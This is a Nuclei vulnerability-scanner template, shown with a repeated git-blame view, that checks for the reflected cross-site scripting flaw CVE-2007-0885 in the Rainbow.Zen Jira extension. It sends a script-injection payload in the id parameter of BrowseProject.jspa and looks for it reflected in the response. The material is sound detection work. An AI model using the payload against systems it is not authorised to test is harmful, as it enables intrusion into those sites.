nuclei-templates/cves/2007/CVE-2007-0885.yaml

id: CVE-2007-0885

info:
  name: Rainbow.Zen Jira XSS
  description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
  reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded
  author: geeknik
  severity: medium
  tags: cve,cve2007,jira,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/jira/secure/BrowseProject.jspa?id=\"><script>alert('{{randstr}}')</script>"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "\"><script>alert('{{randstr}}')</script>"

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "text/html"
Create CVE-2007-0885.yaml 2021-07-16 17:34:42 +00:00			`id: CVE-2007-0885`

			`info:`
			`name: Rainbow.Zen Jira XSS`
			`description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.`
			`reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded`
			`author: geeknik`
			`severity: medium`
			`tags: cve,cve2007,jira,xss`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/jira/secure/BrowseProject.jspa?id=\"><script>alert('{{randstr}}')</script>"`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "\"><script>alert('{{randstr}}')</script>"`
Update CVE-2007-0885.yaml 2021-07-25 20:15:28 +00:00
Create CVE-2007-0885.yaml 2021-07-16 17:34:42 +00:00			`- type: status`
			`status:`
			`- 200`
Update CVE-2007-0885.yaml 2021-07-25 20:15:28 +00:00
Create CVE-2007-0885.yaml 2021-07-16 17:34:42 +00:00			`- type: word`
			`part: header`
Update CVE-2007-0885.yaml 2021-07-17 04:29:54 +00:00			`words:`
Create CVE-2007-0885.yaml 2021-07-16 17:34:42 +00:00			`- "text/html"`